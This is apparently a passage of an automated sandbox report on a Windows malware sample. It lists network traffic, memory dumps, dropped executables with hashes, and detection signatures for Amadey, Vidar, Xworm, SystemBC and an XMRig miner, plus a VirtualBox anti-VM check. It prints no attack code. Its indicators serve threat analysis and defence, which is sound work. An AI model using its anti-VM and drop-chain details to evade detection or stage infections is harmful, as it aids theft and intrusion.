US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.200.14:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.200.14:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.152.202:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
N/A 127.0.0.1:50541 tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp

Files

memory/2948-0-0x0000000000A80000-0x0000000000F30000-memory.dmp

memory/2948-1-0x0000000077C70000-0x0000000077C72000-memory.dmp

memory/2948-2-0x0000000000A81000-0x0000000000AAF000-memory.dmp

memory/2948-3-0x0000000000A80000-0x0000000000F30000-memory.dmp

memory/2948-4-0x0000000000A80000-0x0000000000F30000-memory.dmp

memory/2948-5-0x0000000000A80000-0x0000000000F30000-memory.dmp

\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 457a48e9c0a205ea619dd5d5b4c2a6c3
SHA1 15b8560577817747c13dc391d973ad2e26901315
SHA256 f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e
SHA512 ce53209091c4e22937bf82bd55e219347d4d3a5c339db8b5605ee4753edc2dbe292c40a3da7d736908c27f5c99636fd3c06ab4c81254366d89801cf3d9037e5a

memory/2948-16-0x0000000007020000-0x00000000074D0000-memory.dmp

memory/2780-18-0x0000000000FB0000-0x0000000001460000-memory.dmp

memory/2948-15-0x0000000000A80000-0x0000000000F30000-memory.dmp

memory/2780-19-0x0000000000FB1000-0x0000000000FDF000-memory.dmp

memory/2780-20-0x0000000000FB0000-0x0000000001460000-memory.dmp

memory/2780-22-0x0000000000FB0000-0x0000000001460000-memory.dmp

memory/2780-23-0x0000000000FB0000-0x0000000001460000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/2356-36-0x0000000000DB0000-0x0000000000DC0000-memory.dmp

memory/2780-37-0x0000000000FB0000-0x0000000001460000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/1604-82-0x0000000000400000-0x0000000000840000-memory.dmp

memory/108-81-0x00000000046A0000-0x0000000004AE0000-memory.dmp

memory/108-79-0x00000000046A0000-0x0000000004AE0000-memory.dmp

memory/2780-86-0x0000000000FB0000-0x0000000001460000-memory.dmp

memory/108-87-0x00000000046A0000-0x0000000004AE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/108-102-0x00000000046A0000-0x0000000004AE0000-memory.dmp

memory/2780-105-0x0000000006920000-0x000000000700E000-memory.dmp

memory/2780-104-0x0000000006920000-0x000000000700E000-memory.dmp

memory/2232-106-0x0000000000360000-0x0000000000A4E000-memory.dmp

memory/1604-107-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1604-109-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2780-108-0x0000000000FB0000-0x0000000001460000-memory.dmp

memory/1684-112-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/2780-127-0x0000000006920000-0x000000000700E000-memory.dmp

memory/2780-128-0x0000000006920000-0x0000000006DC1000-memory.dmp

memory/2780-130-0x0000000006920000-0x0000000006DC1000-memory.dmp

memory/2780-131-0x0000000006920000-0x000000000700E000-memory.dmp

memory/2804-132-0x00000000002F0000-0x0000000000791000-memory.dmp

memory/2232-133-0x0000000000360000-0x0000000000A4E000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 4a8de9a1224a92688f27d5bfb505aa49
SHA1 b90d1ff6ea887bc2c1244cdee60a29e6fb22073a
SHA256 7f19e23ec6dbb218cc450401edb075350a918de5c4015ca94dcb2a0d51a97a00
SHA512 cb52e3ffe5f3ef4dcd3d511c8bd4a69e3c500484fe5a1d2578365af90b8f6564505dc00ca969f0d48c709fce48a997a94a1d8b7921127148359e2ddfca3f70d5

memory/2780-136-0x0000000000FB0000-0x0000000001460000-memory.dmp

memory/1604-137-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1684-138-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\Tar8212.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/2780-191-0x0000000006920000-0x0000000006DC1000-memory.dmp

memory/1684-204-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2804-206-0x00000000002F0000-0x0000000000791000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe

MD5 9da08b49cdcc4a84b4a722d1006c2af8
SHA1 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe

MD5 0eb68c59eac29b84f81ad6522d396f59
SHA1 aacfdf3cb1bdd995f63584f31526b11874fc76a5
SHA256 dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f
SHA512 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7

C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

memory/2780-284-0x0000000000FB0000-0x0000000001460000-memory.dmp

memory/1604-285-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1684-287-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/852-303-0x0000000000970000-0x00000000009D0000-memory.dmp

memory/2752-306-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2752-323-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2752-322-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2752-320-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2752-318-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2752-316-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2752-314-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2752-312-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2752-310-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2752-308-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2752-325-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/2172-341-0x0000000000270000-0x0000000000282000-memory.dmp

memory/2172-342-0x00000000001C0000-0x00000000001D0000-memory.dmp

memory/1396-344-0x000000013F8E0000-0x0000000140481000-memory.dmp

memory/1604-343-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2780-345-0x0000000000FB0000-0x0000000001460000-memory.dmp

memory/2640-346-0x000000013FA90000-0x00000001410DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/1548-360-0x00000000000F0000-0x0000000000160000-memory.dmp

memory/1748-380-0x0000000000400000-0x0000000000466000-memory.dmp

memory/1748-367-0x0000000000400000-0x0000000000466000-memory.dmp

memory/1748-369-0x0000000000400000-0x0000000000466000-memory.dmp

memory/1748-373-0x0000000000400000-0x0000000000466000-memory.dmp

memory/1748-378-0x0000000000400000-0x0000000000466000-memory.dmp

memory/1748-377-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1748-375-0x0000000000400000-0x0000000000466000-memory.dmp

memory/1748-371-0x0000000000400000-0x0000000000466000-memory.dmp

memory/1396-446-0x000000013F8E0000-0x0000000140481000-memory.dmp

memory/1684-448-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/2244-469-0x0000000000EF0000-0x000000000138B000-memory.dmp

memory/2780-468-0x0000000006920000-0x0000000006DBB000-memory.dmp

memory/2780-467-0x0000000006920000-0x0000000006DBB000-memory.dmp

memory/1604-474-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2780-473-0x0000000000FB0000-0x0000000001460000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

memory/2480-491-0x000000001B560000-0x000000001B842000-memory.dmp

memory/2480-492-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/3008-497-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MGMBZB19LW7MGBQDHZWO.temp

MD5 e86faecd0b92b6116aaa3cca906d6b9f
SHA1 7264c2cba3c3b3af9f4d7720c59a118134546ddd
SHA256 a8e62ca41334bf8e86ae2aa5e073e7566ebffcb8f6c6f591e9f469b0b478937b
SHA512 4aaa5d2c2cf09e8e151a8335aa0ea5dfbe59b9f6b1bb7ef6815fb55dff79009cd832a9077c2db2022e0022fd272b97163224c05ef7f0ed2bff7aacacdca1c7f2

memory/3008-498-0x0000000002810000-0x0000000002818000-memory.dmp

memory/1684-499-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2244-501-0x0000000000EF0000-0x000000000138B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/2780-514-0x0000000006920000-0x0000000006DBB000-memory.dmp

memory/2780-515-0x0000000006920000-0x0000000006DBB000-memory.dmp

memory/2976-522-0x0000000001D10000-0x0000000001D18000-memory.dmp

memory/2976-521-0x000000001B7A0000-0x000000001BA82000-memory.dmp

memory/1604-523-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2780-525-0x0000000000FB0000-0x0000000001460000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe

MD5 745e4bcf3d176ea5e82a7c26a6733757
SHA1 499cf0a28c9469faabae1e0f998c6a9b3e82862f
SHA256 8af6936111d0ba881e34ec715d1383dc90c017cd5ca3f51f1d69dc02c0aa2c63
SHA512 bd3fe79f49b060ae01766ca3e424a466c5ca652863a00fd23109e177bc7f6b2856eb513ea18ebbf5c3bee8820f817c50fadda44e12fe79656fbe6bb811aba69d

memory/2780-538-0x0000000006300000-0x0000000006609000-memory.dmp

memory/2780-539-0x0000000006300000-0x0000000006609000-memory.dmp

memory/1796-540-0x0000000001030000-0x0000000001339000-memory.dmp

memory/1684-541-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe

MD5 6afaf17077308fa040a656dc9e7d15ed
SHA1 df7caf0b424dc62a60dfb64f585c111448c0c1e3
SHA256 42c07ef38b42451a7b1717dff97266f615f2e5cedab1c5c5827dbe3e6d9f69b0
SHA512 cd459aa3bc462822a61a9f3e943aef48e9e332661c562c39bd92388be1544f034afef9f5f02315b5bce5419564ed4f3fb94e76efcb4422fdd7775aeb011be986

memory/2780-549-0x0000000006300000-0x0000000006609000-memory.dmp

memory/2780-555-0x0000000006920000-0x000000000732D000-memory.dmp

memory/2780-557-0x0000000006300000-0x0000000006609000-memory.dmp

memory/2780-556-0x0000000000FB0000-0x0000000001460000-memory.dmp

memory/1796-558-0x0000000001030000-0x0000000001339000-memory.dmp

memory/1684-560-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1796-562-0x0000000001030000-0x0000000001339000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/1440-573-0x00000000012E0000-0x0000000001358000-memory.dmp

memory/2408-587-0x0000000000400000-0x0000000000465000-memory.dmp

memory/2780-660-0x0000000006920000-0x000000000732D000-memory.dmp

C:\ProgramData\2nop8\myuaas2db

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe

MD5 5d153f73ce1b6a907cf87ddb04ba12b2
SHA1 bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA256 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA512 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe

MD5 8538c195a09066478922511ea1a02edf
SHA1 15e8910df845d897b4bb163caef4c6112570855b
SHA256 d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
SHA512 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

memory/2232-943-0x0000000000360000-0x0000000000A4E000-memory.dmp

C:\ProgramData\2nop8\ymymyu

MD5 c6e1c1cbdbbafc9a480164efdde33bac
SHA1 c3de5624376ec2918635fac16d3a945d93825c63
SHA256 b3689e167043c3c63604862e688330cbb969cc05104f5ec153e5db0d980567cc
SHA512 fc79e9062663787cbdaa6901a4a94cf692292d91ceb580deb81d3f0601fc11044d21599b711fa47d3bf4a3030b12db2b34a98a04e44aa8a7cdb6ecf63d96df9b

C:\ProgramData\2nop8\lx4ozm

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\ProgramData\EF742872A369CDF0.dat

MD5 90a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1 aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA256 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512 ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

C:\ProgramData\18778BF760B0D867.dat

MD5 6093b9b9effe107a1958b5e8775d196a
SHA1 f86ede48007734aebe75f41954ea1ef64924b05e
SHA256 a10b04d057393f5974c776ed253909cafcd014752a57da2971ae0dddfa889ab0
SHA512 2d9c20a201655ffcce71bfafa71b79fe08eb8aa02b5666588302608f6a14126a5a1f4213a963eb528514e2ea2b17871c4c5f9b5ef89c1940c40c0718ec367a77

C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe

MD5 7c169698effcdd45b7cbd763d28e87f5
SHA1 4f9db666d66255cd7ca2b0973ff00eae8b155f7a
SHA256 c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b
SHA512 58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3

C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe

MD5 2012699a5e85cd283323c324aa061bc7
SHA1 69d93116908bf4b6c61a9cb2d3f50a5fbb8cec0f
SHA256 937ff3f78062e3aaad013b88bb6e807770d40bb65e538eee9c5de6b1487510b5
SHA512 729e7f19b8dc678a8f8912a9ab64169391259fe9d129ba99ef91360f82f81b2c2e628d68a4d5d9c2e4e3fe9e5c09ff295e6021bb3d23a107d6ab59a361d66683

C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe

MD5 e935a122d4c4e9c1b44368821a5154ff
SHA1 c93e4b9fb9563cb04a9cd39c75220eaf6007f98f
SHA256 161b8b9257159ff8789d47b9a4f5c4b7c6a6e66470392898a8c301348d28cbb4
SHA512 75a94d4c73fb917adaae4cc2c8e3a74bc4520cd45b87af146b53aca42b194cd26126ad4a2db5efad2aaa41e2874f8b71d58ebab8752c73039e233c8cd94a7e7f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\db\data.safe.bin

MD5 3a323a53ef7554fc415585baabacc2cf
SHA1 9d6af00ea3c5e84c17321e022b395b22c7994c9a
SHA256 160e98106f6fea6b8b4c60ce2f6fab5c912b61e6afbf78f603c9a841769a9f07
SHA512 778677921c66efa0987fbd47b84788b16dac424d3db3bf890fda91bd61dc8117401122e27f81e31a7a304f87ddeaf1bb2caf0d64689899f92ba5822d8e4926fa

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\d41625c8-9be6-404d-b6d9-28e68e206bec

MD5 89054adf1cdefc3a754853aece29d215
SHA1 f3ebd5f373909ebf6bedcfbf3e7be5bcf698fc48
SHA256 d68ccf6a24ff7e4a4beaf0caf061d957aa435864a71e93c9a0bba8658d5b0e8e
SHA512 f559177de099bbbea03f3d91cad51bec9e1af27c859404536b7cde51006255b426063cc5b3d57ab5b468b3c72e1b90b57d45ee26ff8755b821bd793a73e742f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\8260db59-ce4a-4ec5-8fc7-a6923b96376e

MD5 be05a61ddcf57f2796b22e27d8ea9841
SHA1 065c5fca85f8a682e0c9220386013e964a1c936a
SHA256 0d939c02e8e6871c311a3bf416b499c738809b15d642d5bea75bcb53f387acc2
SHA512 1c4df25ae13b6f3be138b6c3f63f1ec22ae973d60c43b74c23549d0f7404b401446443306f2565073e826e73861f2ace265aace0837566771b69809e6352fc7f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

MD5 af3dc27d55fc2649cb5325fca88f451d
SHA1 2f099ca412059d812b34fd2cb2d89329a154448a
SHA256 97e90c239700a709af25f61cb41ee30ec58ef5b8251d1df67133b2d4d3cf22fb
SHA512 8f861d3b547c0bcb90efa6ba52471f8181ba4aa88702cec20918c913b2a77568246caef1ad20bdc1583d0926be0d1913292d2cede549afc994dfbb6ffcfe6f23

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 317125259ae765765ee11cf30c473e32
SHA1 50c861defa414557c6ae70abce9e932259cfc509
SHA256 516c9e00bfe740ed3c1f0087e4f75d5bb4acc78fb3b196c91bd7d50976602632
SHA512 c4333f1da1c9968556d517ff4f94ec1911bf570f85161ffe543ee3768f1fb4b95fc0479380d9ec2d0cd51a8ea9414d0c55e5e500e12d64f743fd21530ffdeeba

C:\Users\Admin\AppData\Local\Temp\10107740101\3bb952ccb1.exe

MD5 e787e8998f5306a754d625d7e29bbeb5
SHA1 14e056dbf0b3991664910ee3a1d23a4bb2c0253d
SHA256 93339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d
SHA512 30463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6

memory/4084-1424-0x0000000000310000-0x0000000000782000-memory.dmp

memory/4084-1425-0x0000000000310000-0x0000000000782000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 22:58

Reported

2025-03-05 23:00

Platform

win10v2004-20250217-en

Max time kernel

138s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
